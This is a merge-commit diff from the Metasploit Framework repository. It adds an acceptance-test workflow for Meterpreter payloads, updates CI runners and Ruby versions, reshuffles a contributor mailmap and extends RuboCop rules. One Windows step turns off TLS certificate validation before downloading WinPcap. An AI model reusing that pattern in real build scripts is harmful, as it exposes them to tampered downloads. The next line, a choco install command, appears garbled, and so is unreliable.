Land #18364 , Add support for filtering sessions

add -e flag for stale sessions
remove single flag pivot to search flag added support for search session type adds search session id support remove stale references reshuffle code fix time parsing, add command support fix search list, reduce duplicated code testing added killall with search lists table of killed sessions sessions are no longer represented by ids addresses feedback on code structure and search behavior some test reshuffling, switch raised errors to printed ones add checkin validation, rest of cmd_sessions tests add time parsing test refactoring test reformatting and adjusted error validation make error handling more explicit, add test context fixes sub quotes, make constant rubocopping switch before and after to greater than and less than mbetter incorporate constants update example
2023-10-19 16:40:42 +01:00 · 2023-10-19 09:41:18 -05:00 · 2023-10-19 03:44:02 -05:00 · 2023-10-19 10:22:57 +02:00 · 2023-10-18 10:05:05 +01:00 · 2023-10-18 09:53:46 +01:00
3006 changed files with 323781 additions and 49940 deletions
@@ -0,0 +1,223 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - 'data/templates/**'
+      - 'modules/payloads/**'
+      - 'lib/msf/core/payload/**'
+      - 'lib/msf/core/**'
+      - 'tools/dev/**'
+      - 'spec/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  # Run all test individually, note there is a separate final job for aggregating the test results
+  test:
+    strategy:
+      fail-fast: false
+      matrix:
+        os:
+          - macos-11
+          - windows-2019
+          - ubuntu-20.04
+        ruby:
+          - 3.0.2
+        meterpreter:
+          # Python
+          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.11 }
+
+          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
+          - { name: java, runtime_version: 8 }
+
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.2 }
+        include:
+          # Windows Meterpreter
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+
+          # Mettle
+          - { meterpreter: { name: mettle }, os: macos-11 }
+          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+
+    runs-on: ${{ matrix.os }}
+
+    timeout-minutes: 25
+
+    env:
+      RAILS_ENV: test
+      HOST_RUNNER_IMAGE: ${{ matrix.os }}
+      METERPRETER: ${{ matrix.meterpreter.name }}
+      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+
+    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
+    steps:
+      - name: Install system dependencies (Linux)
+        if: runner.os == 'Linux'
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - uses: shivammathur/setup-php@5b29e8a45433c406b3902dff138a820a408c45b7
+        if: ${{ matrix.meterpreter.name == 'php' }}
+        with:
+          php-version: ${{ matrix.meterpreter.runtime_version }}
+          tools: none
+
+      - name: Set up Python
+        if: ${{ matrix.meterpreter.name == 'python' }}
+        uses: actions/setup-python@v4
+        with:
+          python-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - uses: actions/setup-java@v3
+        if: ${{ matrix.meterpreter.name == 'java' }}
+        with:
+          distribution: temurin
+          java-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - name: Install system dependencies (Windows)
+        shell: cmd
+        if: runner.os == 'Windows'
+        run: |
+          REM pcap dependencies
+          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
+
+          choco install 7zip.installServerCertificateValidationCallback
+          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
+
+          dir C:\\
+
+          dir %WINDIR%
+          type %WINDIR%\\system32\\drivers\\etc\\hosts
+
+      - name: Checkout code
+        uses: actions/checkout@v3
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v3
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs: test
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v3
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: 3.0.2
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v3
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v3
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -31,29 +31,28 @@ on:
 jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
+          - '3.0'

    name: Ruby ${{ matrix.ruby }}
    steps:
      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          working-directory: docs

      - name: build
        working-directory: docs
        run: |
-          bundle exec ruby build.rb
          bundle exec ruby build.rb --production
@@ -28,7 +28,7 @@ jobs:
  handle-labels:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/github-script@v3
+      - uses: actions/github-script@v6
        with:
          github-token: ${{secrets.GITHUB_TOKEN}}
          script: |
@@ -59,7 +59,7 @@ jobs:
                  comment: `
                    Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

-                    - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+                    - [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
                    - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
                    - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
                  `
@@ -191,6 +191,14 @@ jobs:
                    Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
                  `
                },
+                attic: {
+                  close: true,
+                  comment: `
+                    Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
+            
+                    We've labeled this as \`attic\` and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
+                  `
+                }
              }
            };

@@ -202,16 +210,16 @@ jobs:

            if (config.comment) {
              const precedingWhitespaceLength = config.comment.split("\n")[1].search(/\S/);
-              const commentWithoutPreceedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
-              await github.issues.createComment({
+              const commentWithoutPrecedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
+              await github.rest.issues.createComment({
                issue_number: context.issue.number,
                owner: context.repo.owner,
                repo: context.repo.repo,
-                body: commentWithoutPreceedingWhitespace
+                body: commentWithoutPrecedingWhitespace
              });
            }
            if (config.close) {
-              await github.issues.update({
+              await github.rest.issues.update({
                  issue_number: context.issue.number,
                  owner: context.repo.owner,
                  repo: context.repo.repo,
@@ -28,14 +28,14 @@ on:

 jobs:
  msftidy:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
+          - '3.0'

    name: Lint msftidy
    steps:
@@ -43,7 +43,7 @@ jobs:
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3
        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
        with:
@@ -51,7 +51,7 @@ jobs:

      - uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
        env:
          BUNDLE_WITHOUT: "coverage development pcap"
@@ -28,12 +28,12 @@ on:

 jobs:
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40
    name: Docker Build
    steps:
      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: docker-compose build
        run: |
@@ -44,7 +44,7 @@ jobs:
          /usr/bin/docker-compose build

  test:
-    runs-on: ubuntu-18.04
+    runs-on: ${{ matrix.os }}
    timeout-minutes: 40

    services:
@@ -64,10 +64,19 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
-          - 2.7
-          - 3.0.3
-          - 3.1.1
+          - '3.0'
+          - '3.1'
+          - '3.2'
+          - '3.3.0-preview2'
+        os:
+          - ubuntu-20.04
+          - ubuntu-latest
+        exclude:
+          - { os: ubuntu-latest, ruby: '3.0' }
+        include:
+          - os: ubuntu-latest
+            ruby: '3.1'
+            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
@@ -78,20 +87,22 @@ jobs:
    env:
      RAILS_ENV: test

-    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
      - name: Install system dependencies
-        run: sudo apt-get install libpcap-dev graphviz
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: Setup Ruby
        env:
          BUNDLE_WITHOUT: "coverage development pcap"
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true

      - name: Create database
@@ -40,7 +40,7 @@ jobs:
            const hasPR = await github.rest.pulls.list({
              owner,
              repo,
-              head: owner + ':' + '${{ github.ref_name }}' 
+              head: owner + ':' + '${{ github.ref_name }}'
            });
            console.log('hasPR:');
            console.log(JSON.stringify({ data: hasPR.data, status: hasPR.status }, null, 4));
@@ -3,6 +3,8 @@ Gemfile.local
 Gemfile.local.lock
 # Rubymine project directory
 .idea
+# Visual Studio Code configuration settings directory
+.vscode
 # Sublime Text project directory (not created by ST by default)
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
@@ -17,6 +19,8 @@ Gemfile.local.lock
 .yardoc
 # Mac OS X files
 .DS_Store
+# Ignore Solargraph config file
+.solargraph.yml
 # database config for testing
 config/database.yml
 # target config file for testing
@@ -1,45 +1,20 @@
-acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
-adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
 adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
-bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
-bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
 cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
 dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
 dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
-ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
 gwillcox-r7 <gwillcox-r7@github>       <Grant_Willcox@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
-jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>         <jqian@rapid7.com>
 jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
-lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
 mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
-sjanusz-r7 <sjanusz-r7@github>         <simon_janusz@rapid7.com>
 smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
 space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
-tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
-wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -48,9 +23,15 @@ wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

+acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
+adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
 asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
+bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
 bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
@@ -58,6 +39,7 @@ brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
+bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
@@ -75,6 +57,7 @@ DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmai
 dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
 dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
 dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
@@ -97,6 +80,8 @@ hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
 jabra <jabra@github>                   <jabra@spl0it.org>
+jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -105,6 +90,8 @@ jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
 jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
+jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>         <jqian@rapid7.com>
 joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
@@ -123,6 +110,8 @@ lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
+lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
@@ -137,6 +126,7 @@ nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
 nullbind <nullbind@github>             Scott Sutherland <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
 oj <oj@github>                         <oj@buffered.io>
+pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
 r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
@@ -155,6 +145,10 @@ scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.u
 sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
 sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
 sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+sjanusz-r7 <sjanusz-r7@github>         <simon_janusz@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 smashery <smashery@github>             Ashley Donaldson <smashery@gmail.com>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
@@ -163,6 +157,7 @@ stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
 tatanus <tatanus@github>               <adam_compton@rapid7.com>
+tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
 timwr <timwr@github>                   <timrlw@gmail.com>
@@ -170,12 +165,15 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
 void-in <void-in@github>               <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
+wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
+wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
+wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

 # Aliases for utility author names. Since they're fake, typos abound
@@ -185,4 +183,4 @@ Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -22,6 +22,7 @@ require:
  - ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
+  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb

 Layout/SpaceBeforeBrackets:
  Description: >-
@@ -79,6 +80,17 @@ Lint/UnexpectedBlockArity:
 Lint/UnmodifiedReduceAccumulator:
  Enabled: true

+Lint/UnusedMethodArgument:
+  Description: >-
+    Disabled on files under the lib/ directory (aka library files)
+    as this can break YARD documentation since YARD doesn't recognize
+    the _ prefix before parameter names and thinks its a different argument.
+    See https://github.com/rapid7/metasploit-framework/pull/17735
+    Also see https://github.com/rubocop/rubocop/pull/11020
+  Enabled: true
+  Exclude:
+    - 'lib/**/*'
+
 Style/ArgumentsForwarding:
  Enabled: true

@@ -155,6 +167,9 @@ Layout/ModuleHashValuesOnSameLine:
 Layout/ModuleDescriptionIndentation:
  Enabled: true

+Lint/DetectInvalidPackDirectives:
+  Enabled: true
+
 Lint/ModuleDisclosureDateFormat:
  Enabled: true

@@ -175,12 +190,13 @@ Lint/DeprecatedGemVersion:
  Exclude:
    - 'metasploit-framework.gemspec'

-Metrics/ClassLength:
+Metrics/ModuleLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
-  Enabled: true
-  Exclude:
-    - 'modules/**/*'
-    - 'test/modules/**/*'
+  Enabled: false
+
+Metrics/ClassLength:
+  Description: 'Most Metasploit classes are quite large. This is ok.'
+  Enabled: false

 Style/ClassAndModuleChildren:
  Enabled: false
@@ -217,6 +233,10 @@ Style/FrozenStringLiteralComment:
  Enabled: false
  Description: 'We cannot support this yet without a lot of things breaking'

+Style/MutableConstant:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
 Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false
@@ -253,6 +273,18 @@ Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false

+Style/EvenOdd:
+  Description: 'This adds no efficiency nor space saving'
+  Enabled: false
+
+Style/FloatDivision:
+  Description: 'Not a safe rule to run on Metasploit without manual verification as the right hand side may be a string'
+  Enabled: false
+
+Style/FormatString:
+  Description: 'Not a safe rule to run on Metasploit without manual verification that the format is not redefined/shadowed'
+  Enabled: false
+
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
@@ -350,6 +382,191 @@ Naming/MethodParameterName:
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2

+Naming/PredicateName:
+  Enabled: true
+  # Current methods that break the rule, so that we don't add additional methods that break the convention
+  AllowedMethods:
+    - has_additional_info?
+    - has_advanced_options?
+    - has_auth
+    - has_auto_target?
+    - has_bad_activex?
+    - has_badchars?
+    - has_chars?
+    - has_check?
+    - has_command?
+    - has_content_type_extension?
+    - has_datastore_cred?
+    - has_evasion_options?
+    - has_fatal_errors?
+    - has_fields
+    - has_files?
+    - has_flag?
+    - has_function_name?
+    - has_gcc?
+    - has_h2_headings
+    - has_input_name?
+    - has_j_security_check?
+    - has_key?
+    - has_match?
+    - has_module
+    - has_object_ref
+    - has_objects_list
+    - has_options?
+    - has_page?
+    - has_passphrase?
+    - has_pid?
+    - has_pkt_line_data?
+    - has_prereqs?
+    - has_privacy_waiver?
+    - has_privates?
+    - has_protected_mode_prompt?
+    - has_proxy?
+    - has_read_data?
+    - has_ref?
+    - has_required_args
+    - has_required_module_options?
+    - has_requirements
+    - has_rop?
+    - has_s_flag?
+    - has_service_cred?
+    - has_subscriber?
+    - has_subtree?
+    - has_text
+    - has_tlv?
+    - has_u_flag?
+    - has_users?
+    - has_vuln?
+    - has_waiver?
+    - have_auth_error?
+    - have_powershell?
+    - is_accessible?
+    - is_admin?
+    - is_alive?
+    - is_alpha_web_server?
+    - is_android?
+    - is_app_binom3?
+    - is_app_carlogavazzi?
+    - is_app_cnpilot?
+    - is_app_epaduo?
+    - is_app_epmp1000?
+    - is_app_infovista?
+    - is_app_ironport?
+    - is_app_metweblog?
+    - is_app_oilom?
+    - is_app_openmind?
+    - is_app_popad?
+    - is_app_radware?
+    - is_app_rfreader?
+    - is_app_sentry?
+    - is_app_sevone?
+    - is_app_splunk?
